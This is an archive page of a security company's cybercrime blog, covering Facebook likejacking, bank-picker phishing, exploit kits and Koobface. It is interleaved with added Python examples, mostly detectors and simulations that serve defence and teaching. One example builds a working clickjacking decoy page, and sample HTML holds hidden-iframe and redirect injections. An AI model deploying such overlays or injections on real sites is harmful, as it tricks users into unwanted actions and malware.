Archive for the ‘Cybercrime’ Category


More Likejacking: This Guy Took A Picture Of His Face Everyday For 8 Years

By Satnam Narang  •  March 4th, 2011  •   Cybercrime

Since posting about the Justin Bieber likejacking campaign, we have observed similar campaigns cropping up.

Apparently, This Guy Took A Picture Of His Face Every Day For 8 Years

Most recent and notable is a new campaign that purports to showcase a time-lapse video of a man who took a picture of his face every day for 8 years. From the power of celebrity to outrageous and shocking headlines, scammers have managed to strike the right chord for luring in users. This particular version shows just how successful they are.


Can’t Believe A Girl Did This Because of Justin Bieber? You Shouldn’t

By Satnam Narang  •  February 28th, 2011  •   Cybercrime

We are currently monitoring a Facebook “likejacking” scam that is similar to previous campaigns that were first observed in 2010.

Justin Bieber Likejacking Scam Spreads on Facebook

“Likejacking” is the term for a clickjacking attack that leads an end user to unknowingly “like” a website via the social network Facebook. By tricking users into liking the page, a post is published to their Facebook walls, where it can be viewed by their friends and family.
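To make the mechanics concrete, here is an added example in Python; it is not code from the original post. The first part is the skeleton of a likejacking page: a visible decoy button with a transparent, offset iframe stacked over it, so the victim's click lands on the framed Like button rather than on "Play video". The second part, framing_allowed(), evaluates a response's X-Frame-Options and Content-Security-Policy frame-ancestors headers the way a browser does, which is the check you would run against your own pages to see whether they can be framed at all. The origins social.example and attacker.example, the widget URL and the pixel offsets are constructed.

```python
"""Likejacking mechanics and a framing-protection check.

Added example, not code from the original post. The decoy HTML and the
origins used below (social.example, attacker.example) are constructed.
"""
from urllib.parse import urlsplit

# The attacker's page: a visible decoy button and, on top of it, a fully
# transparent iframe that loads the real widget. The iframe is offset so the
# widget's button sits exactly under the decoy; the victim's click lands on
# the real button while they believe they clicked "Play video".
DECOY_TEMPLATE = """<!doctype html>
<div style="position:relative;width:320px;height:60px">
  <button style="position:absolute;top:0;left:0;width:320px;height:60px">
    Play video
  </button>
  <iframe src="{target}" scrolling="no"
          style="position:absolute;top:-{dy}px;left:-{dx}px;width:{w}px;height:{h}px;
                 opacity:0;border:0;z-index:2"></iframe>
</div>
"""


def build_decoy_page(target, dx, dy, w=800, h=600):
    """Return the overlay page for a widget whose button sits at (dx, dy)."""
    return DECOY_TEMPLATE.format(target=target, dx=dx, dy=dy, w=w, h=h)


def _origin(url):
    """(scheme, host, port) of a URL; port is '' when not given."""
    u = urlsplit(url.lower())
    return (u.scheme, u.hostname or "", str(u.port) if u.port else "")


def _source_matches(src, page, framer):
    """Match one CSP frame-ancestors source expression against the framer."""
    src = src.lower()
    if src == "'self'":
        return framer == page
    if src == "*":
        return True
    if "://" in src:
        scheme, rest = src.split("://", 1)
        if scheme != framer[0]:
            return False
    else:
        rest = src
    host, _, port = rest.partition(":")
    if port and port != "*" and port != framer[2]:
        return False
    if host.startswith("*."):
        return framer[1].endswith(host[1:])
    return host == framer[1]


def framing_allowed(headers, page_url, framer_origin):
    """True if a browser would let framer_origin embed page_url.

    frame-ancestors wins over X-Frame-Options when both are present, and an
    X-Frame-Options value the browser does not recognise is ignored, so a
    misspelt value gives no protection at all.
    """
    h = {k.lower(): v for k, v in headers.items()}
    page, framer = _origin(page_url), _origin(framer_origin)

    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = parts[1:]
            if not sources or "'none'" in (s.lower() for s in sources):
                return False
            return any(_source_matches(s, page, framer) for s in sources)

    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framer == page
    if xfo.startswith("ALLOW-FROM "):          # obsolete, but still seen
        return framer == _origin(xfo[len("ALLOW-FROM "):].strip())
    return True
```

The caveat a practitioner should keep in mind: a Like button is designed to be embedded on third-party sites, so the widget provider cannot simply deny framing, and framing_allowed() will report the widget as framable. The header check protects pages you control; protection for an embeddable widget has to come from the widget itself, for example a confirmation step after the click.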


Facebook ’1st Status’ Scam Spreads Rapidly

By Satnam Narang  •  January 11th, 2011  •   Cybercrime

It shouldn’t come as a surprise that malicious activity on social networks such as Facebook has risen over the last few years, as the people behind these scam operations continue to improve their efforts. The appeal of targeting these users is the inherent trust that is built into social networks.

Currently, there is an ongoing campaign targeting Facebook users. Users are posting status updates that claim to show what their first status update on Facebook was.

First instance of the '1st status' update scam spreading


Which Bank would you like with that Phish?

By Gavin Neale  •  December 9th, 2010  •   Cybercrime

Over the last couple of years we have seen a decline in traditional phishing schemes as cyber criminals have moved to banking malware such as Zeus and SpyEye. These tools can steal credentials for a wide range of websites and, by using man-in-the-browser techniques, can defeat the two-factor authentication used by many banking websites.

Lately we have seen a number of phishing emails in which the phishers impersonate a third party that has a plausible reason for interacting with your bank, such as a tax department. The phishers attract victims via spam to a landing page where they are asked to choose their bank from a selection, and are then shown a fake login page for that bank. This increases the chance of the phisher matching a bank to a potential victim.

This email, targeted at British recipients, promises the recipient that they are eligible for a tax refund from HM Revenue and Customs. By clicking the Refund Me Now link they can be on their way to receiving their tax refund.

Following the link takes the recipient to the phishing landing page below, which carries the logos of 15 banks and asks the user to click on the logo of their bank to continue. Each logo links to a fake banking website that resembles that bank’s real website.

The landing page where users are asked to select their bank

When we click on the HSBC bank logo we are taken to a page designed to phish credentials from HSBC members:

The phishing page the victim is sent to if they click the HSBC bank logo

We saw a nearly identical campaign two months ago that was phishing for bank accounts in New Zealand. This is just another technique cyber criminals are using to increase their returns as people become more aware of how phishing attacks work.
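The "choose your bank" pattern is easy to spot mechanically: one page on a single host offers login links for several unrelated banks, and none of those links lead to a domain the bank actually owns. The Python below is an added example, not code from the original post, that scores a landing page on that basis. The sample HTML, the host refund-gov-uk.example and the brand-to-domain table are constructed and abbreviated for illustration; a real watchlist would hold the brands your own users bank with.

```python
"""Triage heuristic for 'choose your bank' phishing landing pages.

Added example, not code from the original post. The sample page, the host
names and the brand table are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Brands to look for and the registrable domains each legitimately uses.
# Illustrative and abbreviated: extend from your own records.
BANK_DOMAINS = {
    "hsbc": {"hsbc.co.uk", "hsbc.com"},
    "barclays": {"barclays.co.uk"},
    "lloyds": {"lloydsbank.com"},
    "natwest": {"natwest.com"},
}

# Constructed landing page in the style described above: every bank logo is
# a link, but all of them stay on the phisher's own host.
LANDING_PAGE = """
<h1>Select your bank to receive your refund</h1>
<a href="/hsbc/login.php"><img src="/img/hsbc.png" alt="HSBC"></a>
<a href="/barclays/login.php"><img src="/img/barclays.png" alt="Barclays"></a>
<a href="http://refund-gov-uk.example/lloyds/"><img src="/img/lloyds.png" alt="Lloyds TSB"></a>
<a href="/natwest/login.php">NatWest</a>
"""


class _LinkCollector(HTMLParser):
    """Collect (href, label) for every anchor; the label includes image alts."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "a" and attr.get("href"):
            self._href, self._text = attr["href"], []
        elif tag == "img" and self._href is not None:
            self._text.append(attr.get("alt", "") + " " + attr.get("src", ""))

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join(self._text).lower()))
            self._href = None


def _registrable(host):
    """Crude registrable-domain guess: last two labels, three for co.uk-style."""
    labels = host.lower().split(".")
    n = 3 if len(labels) >= 3 and labels[-2] in {"co", "com", "org", "ac"} else 2
    return ".".join(labels[-n:])


def assess_bank_picker(page_url, html):
    """Return (suspicious, findings) for one landing page.

    findings is a list of (brand, link_host, link_is_legitimate). The page is
    flagged when it offers links for at least three brands and not one of
    those links resolves to a domain the brand owns.
    """
    parser = _LinkCollector()
    parser.feed(html)
    findings = []
    for href, label in parser.links:
        host = urlsplit(urljoin(page_url, href)).hostname or ""
        for brand, owned in BANK_DOMAINS.items():
            if brand in label or brand in host:
                findings.append((brand, host, _registrable(host) in owned))
    brands = {b for b, _, _ in findings}
    impersonated = {b for b, _, legit in findings if not legit}
    suspicious = len(brands) >= 3 and brands == impersonated
    return suspicious, findings
```

The brand-ownership check is what keeps a bank's own "other services" page from being flagged: a legitimate page linking several of its own brands resolves to owned domains, while the phishing page keeps every link on the phisher's host.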


Siberia Exploits Kit Fights Back Against AV Companies

By Daniel Chechik  •  November 30th, 2010  •   Cybercrime

Siberia Exploit Kit is an evolving crimeware toolkit that was first seen in the wild in late 2009. A few months ago the author of Siberia Exploit Kit deployed an upgraded version of the toolkit, as described on the Malware Intelligence Blog.

Login panel of Siberia Exploit’s Kit

As with Phoenix Exploit’s Kit, described in our last post, the author of Siberia Exploit’s Kit also puts weight on evading detection by anti-virus and URL-filtering services: the kit contains a built-in anti-virus checker.

Anti-Virus Detection rate of each malware

The administrator of the toolkit can run an anti-virus scan of the malware and of the exploit pages, and the results from each anti-virus vendor are viewable individually.

Advanced information of the malware detection among the Anti-Viruses companies

It is well known that files uploaded to VirusTotal are shared with the anti-virus companies, who can then analyze the suspicious samples. It is therefore a safe guess that Siberia Exploit’s Kit does not use VirusTotal. In this particular case, the files are sent to an underground anti-virus checker called “scan4you.biz”.

The code that accesses to scan4you.biz AV checker (Taken from Siberia Exploit’s Kit)

Let’s take a look at our anonymous Anti-Virus checker:

After login, the user can upload files and submit URLs for anti-virus and URL-filtering checks

Of course, this service is not free: the cost is 0.15¢ per file checked, or $25 for a one-month license. The website offers several kinds of scan:

  • File scan – Regular Anti-Virus scan
  • URL scan – Anti-Virus scan of URL
  • Blacklist / Filter scan – Check detection of URL in URL filtering services
  • Exploit Pack scan – Check detection of toolkit name in URL filtering services

To allow the service to be integrated into Siberia Exploit’s Kit, or into any other toolkit, the underground anti-virus checking service publishes an API for remote scanning:

Snippet code of the API service provided by scan4you.biz website.

Like other evasion techniques we have seen lately, such as “Anti Wepawet” or “Anti JSunpack” as described in our security labs report, this shows that cybercriminals keep finding creative ways to avoid malware detection at multiple layers, this time by pre-scanning their own files and URLs against anti-virus and URL-filtering products before deploying them.


Changing Battlefield

By Vadim Pogulievsky  •  November 15th, 2010  •   Cybercrime

The success of the Zeus Trojan has led directly to the creation of the ZeusTracker project, and as of a few weeks ago, the SpyEye Tracker project was put into play.

So what’s left to say other than SpyEye is now in our midst…

Now that we agree about the success of the banking Trojans, let’s talk a little bit about one of their primary victims: the banks themselves.

A few months ago, the M86 Security Labs team discovered another SpyEye C&C server targeting one of the largest American banks. As part of the internal M86 disclosure policy, we contacted the bank to provide the detailed information we had discovered.

In this particular case of malicious activity, the SpyEye Trojan’s “install base” included more than 270,000 infections. The bank eventually confirmed that more than 200 bank accounts had been compromised.

True, there’s nothing new in this…

However, since this is far from the first time we have contacted banks to provide this type of information, we sat up and took notice of the gradual change in the way banks respond to our data.

Just a year ago, a bank’s response would have been akin to:

“Why contact us? Certainly this is a police issue!” or “Where are you from? Kindly talk to your local branch”. One bank questioned, “Where is malicious server located? Eastern Europe? So, why are you contacting us?”

I believe everyone who had provided similar information to various banks encountered the same sort of responses.

Today, the situation is conceptually different. Based on several recent cases, we can verify that the banks have begun to take this information much more seriously.

First, they’ve educated themselves on banking Trojans, a refreshing change. Second, they are ready to cooperate and convey a willingness to investigate the information provided further. For example, the SpyEye case mentioned above took less than a month with the bank. At the conclusion of the case, we received complementary information that had been confirmed by the bank.

Without any pretense of accurate statistics, the change in the banks’ behavior is significant, and it is a result of the losses the banks have suffered, and continue to suffer, from this new kind of banker Trojan activity.

The success of Zeus and SpyEye has caused numerous copycats to appear, such as the new Bugat, Carberp and, latest, Feodo Trojans. The war the banks were engaged in at the birth of cybercrime has become increasingly sophisticated. Given the new battle landscape, banks have begun to regroup their efforts in fighting back.


Phoenix Exploit Kit 2.0

By Daniel Chechik  •  August 1st, 2010  •   Cybercrime

Phoenix Exploit’s Kit 2.0 is an upgraded version of the Phoenix toolkit that was initially researched by M86 Security Labs in mid-2009.

The GUI of the admin panel has not changed significantly from the previous version, but in addition to new features and exploits, a new obfuscation technique has been employed.


Figure 1: The login panel of Phoenix Exploit’s Kit


Koobface malware distribution technique – automatic user account creation on FaceBook, Twitter, BlogSpot and others

By Daniel Chechik  •  August 11th, 2009  •   Cybercrime Malware

Koobface is a well-discussed computer worm that tries to infect users using social engineering attacks. Koobface mainly abuses popular social-networking websites such as Facebook, Twitter, Bebo and Myspace. 
In this post I’ll describe another, less discussed, distribution tactic of this malware: the use of SEO techniques. In this scenario, the malware automatically creates BlogSpot accounts and populates them with the latest news taken from the Google News feed. The trap site therefore carries up-to-date content containing some of the most popular search terms.
 
The blog shown above is an example of such an account that was automatically created by Koobface. In addition to the news feed, the malware also adds a script that redirects the victim to a malicious website that tries to install the Trojan. 
Following is a code snippet of the malicious script: 
 
 
The user is redirected to a fake Facebook page:
http://mi[--REMOVED--]09.com/go/fb.php 
 
In order to see the video, the user is asked to “upgrade” his Flash Player. Needless to say, any click on this page will dupe the user into downloading the malware…
 
Once the malware is downloaded, it tries to create new accounts in various websites. To do that, it needs to overcome a security mechanism called CAPTCHA (“Completely Automated Public Turing test to tell Computers and Humans Apart”) that is present on many websites and is designed to prevent computer programs from performing certain sensitive actions such as creating new accounts.
Following are the actions created by the malware
 
 
The Koobface tactic for bypassing the CAPTCHA test is simple: it challenges its infected users with the test by presenting the window shown below. The user is prompted to enter the word(s) in the image or his machine will shut down. The CAPTCHA image is sent to the victim by the C&C server.
 
The virus darkens the background and leaves the user no other option than to insert the code in the CAPTCHA within 3 minutes or else it will shut down his computer (we tested it: it doesn’t shut down the machine:)). 
Does this CAPTCHA look familiar? Let me give you a hint…. 
 
Indeed, the CAPTCHA picture shown above is taken from Twitter’s account creation form. Several other popular websites, such as Bebo, Gmail and Blogger, are abused in a similar manner.
 
Here is another example. This time, the CAPTCHA is part of a Gmail account creation: 
 
Koobface, installed on the victim machine, gets a CAPTCHA challenge by Gmail: 
The virus sends the CAPTCHA to the C&C server: 
 
The process might take several seconds, depending on how fast the person on another infected machine enters the code from the CAPTCHA.
The malware keeps asking the C&C for the code, until it receives it:
 
 
Once the code is retrieved, the process continues and the new account is created: 
 
As can be seen in the Fiddler dump above, the malware used the retrieved code from the C&C to successfully create the Gmail account. I can even log into the account using the credential above… 
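The relay described above is worth seeing end to end, because it explains why a CAPTCHA on its own does not stop automated signups: the test is solved by a real human, just not the one sitting at the registering machine. The Python below is an added example, not Koobface's code. It models the four parties as toy objects: a signup form protected by a CAPTCHA, the C&C holding a queue of unsolved images, the bot on the machine that is creating the account (which polls the C&C until an answer arrives, as in the post), and the bot on a second infected machine whose user is coerced into typing the solution. Every name, message shape and the solution text are constructed; only the flow follows the post.

```python
"""Koobface-style CAPTCHA relay, modelled end to end.

Added example, not Koobface's code. All class names, message formats and
the challenge text below are constructed; only the flow (fetch CAPTCHA,
hand it to the C&C, poll until another victim solves it, submit) follows
the post.
"""
import itertools


class RegistrationSite:
    """Stand-in for a signup form protected by a CAPTCHA."""
    def __init__(self, solutions):
        self._solutions = solutions           # challenge id -> expected text
        self._ids = itertools.count(1)
        self.accounts = {}

    def new_challenge(self):
        cid = next(self._ids)
        return cid, f"<image bytes for challenge {cid}>"

    def register(self, username, cid, answer):
        if self._solutions.get(cid) != answer:
            return False
        self.accounts[username] = cid
        return True


class CommandAndControl:
    """Toy C&C: a queue of unsolved CAPTCHAs and the answers as they arrive."""
    def __init__(self):
        self._pending = {}                    # task id -> image
        self._solved = {}                     # task id -> text
        self._ids = itertools.count(100)

    def submit_captcha(self, image):
        tid = next(self._ids)
        self._pending[tid] = image
        return tid

    def next_task_for_victim(self):
        """Hand any unsolved CAPTCHA to a bot that can show it to a human."""
        return next(iter(self._pending.items()), None)

    def report_solution(self, tid, text):
        if tid in self._pending:
            del self._pending[tid]
            self._solved[tid] = text

    def get_solution(self, tid):
        return self._solved.get(tid)          # None until someone solved it


def coerced_victim(cnc, type_answer):
    """Bot on a second infected machine: fetch a task, show the threatening
    dialog, send back whatever the user types. type_answer stands in for the
    human and returns the text they typed. Returns False if nothing to do."""
    task = cnc.next_task_for_victim()
    if task is None:
        return False
    tid, image = task
    cnc.report_solution(tid, type_answer(image))
    return True


def registering_bot(site, cnc, username, run_victim, max_polls=10):
    """Bot creating the account: polls the C&C until the answer arrives.
    run_victim() advances the other machine by one step (it stands in for
    time passing). Returns the number of polls needed, or -1 on give-up."""
    cid, image = site.new_challenge()
    tid = cnc.submit_captcha(image)
    for poll in range(1, max_polls + 1):
        answer = cnc.get_solution(tid)
        if answer is not None:
            return poll if site.register(username, cid, answer) else -1
        run_victim()
    return -1


def demo():
    """Run one relay. The human only becomes available on the third tick,
    so the first three polls come back empty and the fourth returns the
    answer; the post's 'keeps asking the C&C for the code' loop."""
    site = RegistrationSite(solutions={1: "grape tower"})
    cnc = CommandAndControl()
    ticks = itertools.count(1)

    def run_victim():
        if next(ticks) >= 3:
            coerced_victim(cnc, lambda image: "grape tower")

    polls = registering_bot(site, cnc, "autogen_user", run_victim)
    return polls, "autogen_user" in site.accounts
```

The defensive takeaway falls out of the model: RegistrationSite cannot tell a relayed answer from a genuine one, so abuse of signup forms has to be detected from other signals (registration velocity per source, reputation of the registering IP, what the account does next) rather than from the CAPTCHA result alone.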
 
The malware then goes on to create its own blog using the email account it just created, opening a blog on Blogger.com:
 
Firstly, as can be seen in the Fiddler dump, it accesses:
http://news.google.com/?output=rss
The virus takes the latest news results from Google which will be used to create the blog post. 
Following that, it accesses Blogger.com to create a new blog post. 
 
 
Shown here is the blog post that the malware created just like the one we have seen at the beginning of this post. 
The cybercriminals use a webservice to collect some statistics. Below you can see the number of unique users who reached these pages in the last couple of days: 
 
 
As can be seen in the Referrer statistics above, the users are reaching the malware webpage from different websites, while each URL is using a different social engineering technique to trick the user. 
 
There is no doubt that the technique works – more than 150,000 users reached the malware webpage in just 2 days! 
Posted by Daniel Chechik


Sparc.com compromised

By Anonymous  •  August 4th, 2009  •   Cybercrime

Last week, we detected that Sparc.com website was compromised by cybercriminals. In this case, the criminals injected a script into the website that adds an IFrame to the page. This IFrame redirects the website visitors to malicious content located on updatedate.cn . 
 

Our recent tests indicate that updatedate.cn no longer serves malicious code; however, we did find records in our systems indicating that this domain had been serving malware since July 15th, 2009, mostly exploiting the PDF vulnerability to infect users.
We have contacted sparc.com and reported the incident, trusting that the problem will be fixed soon.
Posted by Yuval Ben-Itzhak
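Both this compromise and the Koobface blogs above come down to a small piece of injected markup that sends visitors somewhere else: here a script that writes a hidden IFrame pointing off-site, there a script dropped into an auto-generated blog that redirects to the fake Facebook page. The Python below is an added example, not code from either post, that scans page HTML for those two patterns plus the obfuscation wrappers (eval, unescape, String.fromCharCode) that typically hide them. The two sample pages are constructed; the iframe target is updatedate.cn only because this post names that domain, and the redirect host fakevideo.example stands in for the redacted one in the Koobface post.

```python
"""Detecting injected off-site redirectors in page HTML.

Added example, not code from the original posts. The sample pages and the
host fakevideo.example are constructed; updatedate.cn is the domain the
Sparc.com post names.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Script-driven navigation to an absolute URL (location=, location.href=,
# location.replace(...)) and script-written iframes.
REDIRECT_RE = re.compile(
    r"(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=\s*['\"](https?://[^'\"]+)"
    r"|location\.replace\(\s*['\"](https?://[^'\"]+)", re.I)
IFRAME_WRITE_RE = re.compile(r"<iframe[^>]+src=['\"]?(https?://[^'\" >]+)", re.I)
# Decode-then-evaluate wrappers: the destination cannot be read statically,
# which is itself worth a finding.
OBFUSCATION_RE = re.compile(r"\b(?:unescape|eval|String\.fromCharCode)\s*\(", re.I)

# Constructed sample in the style of the Sparc.com injection.
SPARC_LIKE = """<html><body><h1>Welcome</h1>
<script type="text/javascript">document.write('<iframe src="http://updatedate.cn/in.php" width="0" height="0" style="display:none"></iframe>');</script>
</body></html>"""

# Constructed sample in the style of a Koobface SEO blog: fresh headlines
# plus a redirect to the malware page.
BLOG_LIKE = """<html><body><h2>Top stories</h2><p>Headline text lifted from a news feed.</p>
<script>window.location.href = "http://fakevideo.example/go/fb.php";</script>
</body></html>"""


class _PageScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []          # (src, attrs)
        self.scripts = []          # inline script bodies
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self.iframes.append((a.get("src", ""), a))
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def _host(url):
    return (urlsplit(url).hostname or "").lower()


def _hidden(attrs):
    """Zero-sized or invisible frame: the classic drive-by injection shape."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return ("display:none" in style or "visibility:hidden" in style
            or "width:0" in style or "height:0" in style
            or attrs.get("width") == "0" or attrs.get("height") == "0")


def scan_page(page_url, html):
    """Return a list of (kind, destination_host, detail) findings."""
    p = _PageScanner()
    p.feed(html)
    site = _host(page_url)
    findings = []
    for src, attrs in p.iframes:
        dst = _host(src)
        if dst and dst != site and _hidden(attrs):
            findings.append(("hidden_iframe", dst, src))
    for script in p.scripts:
        for m in IFRAME_WRITE_RE.finditer(script):
            dst = _host(m.group(1))
            if dst and dst != site:
                findings.append(("script_iframe", dst, m.group(1)))
        for m in REDIRECT_RE.finditer(script):
            url = m.group(1) or m.group(2)
            dst = _host(url)
            if dst and dst != site:
                findings.append(("script_redirect", dst, url))
        if OBFUSCATION_RE.search(script):
            findings.append(("obfuscated_script", "", script.strip()[:60]))
    return findings
```

Same-origin iframes and same-site redirects are deliberately ignored, since those are normal page behaviour; the signal in both incidents is that the destination is a host the page's owner does not control.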


Someone is watching you…

By Daniel Chechik  •  July 19th, 2009  •   Cybercrime

As you probably know, security companies are using sandboxes in order to analyze viruses. You might be familiar with some of those sandboxes such as CWSandbox, Anubis, etc. 
 

Those analysis tools run the virus on a virtual host for a limited time, and report to the user about the virus’s activities. 

Recently, I analyzed an interesting virus. Besides stealing sensitive data from the user, it also connects every few minutes to an FTP account and uploads 2 files.
 

I took a closer look at the uploaded files, and surprisingly found this FTP full of screenshots. Let’s take a look at one screenshot. 
 

This picture was taken from the FTP and it belongs to one of the infected machines.
I think you will all agree with me – stealing personal data is bad enough, but tracking each and every move we make?! No… That’s really too much! 

Of course, on this FTP I also found a screenshot of my sandbox’s desktop: 
 

Other sandboxes didn’t get away with it either… you probably recognized CWSandbox here: 
 

Like facing mirrors, we were watching them watching us watching them… 
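The one behaviour in this post that is visible from the network alone is the clockwork upload: a client connecting to the same FTP server every few minutes and pushing a similar-sized payload each time. The Python below is an added example, not code from the original post, that finds that pattern in flow records by looking for near-constant inter-arrival times. The records are constructed: one host uploads screenshots at a five-minute cadence, another uses FTP in an ordinary, irregular way.

```python
"""Flagging beaconing uploads from flow records.

Added example, not from the original post. The flow records are
constructed: timestamps, addresses and byte counts are made up to show one
periodic uploader beside a host with ordinary FTP use.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed NetFlow-style records: timestamp src dst dst_port bytes_out
FLOWS = """
2009-07-15T10:00:05 10.0.0.7 198.51.100.9 21 41200
2009-07-15T10:05:03 10.0.0.7 198.51.100.9 21 39800
2009-07-15T10:10:06 10.0.0.7 198.51.100.9 21 42100
2009-07-15T10:15:04 10.0.0.7 198.51.100.9 21 40500
2009-07-15T10:20:05 10.0.0.7 198.51.100.9 21 41900
2009-07-15T10:01:10 10.0.0.12 198.51.100.20 21 1200000
2009-07-15T10:47:55 10.0.0.12 198.51.100.20 21 8000
2009-07-15T13:02:31 10.0.0.12 198.51.100.20 21 33000
2009-07-15T13:03:02 10.0.0.12 198.51.100.20 21 910
"""


def parse_flows(text):
    """Parse the whitespace-separated records into tuples."""
    rows = []
    for line in text.strip().splitlines():
        ts, src, dst, port, nbytes = line.split()
        rows.append((datetime.fromisoformat(ts), src, dst, int(port), int(nbytes)))
    return rows


def find_periodic_uploads(rows, port=21, min_events=4, max_cv=0.2, min_bytes=10_000):
    """Return {(src, dst): (mean_interval_seconds, cv)} for periodic sessions.

    cv is the coefficient of variation of the inter-arrival times; a
    clockwork schedule gives a cv near 0, while human-driven use is spread
    out. min_bytes drops control-channel chatter that carries no payload.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, p, nbytes in rows:
        if p == port and nbytes >= min_bytes:
            by_pair[(src, dst)].append(ts)
    hits = {}
    for pair, times in by_pair.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        m = mean(gaps)
        cv = pstdev(gaps) / m if m else float("inf")
        if cv <= max_cv:
            hits[pair] = (round(m), round(cv, 3))
    return hits
```

The thresholds are starting points, not tuned values: a short timer with jitter added by the malware author will push cv up, so in practice you would widen max_cv and require more events, and look at payload size regularity as a second feature.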
Posted by Daniel Chechik
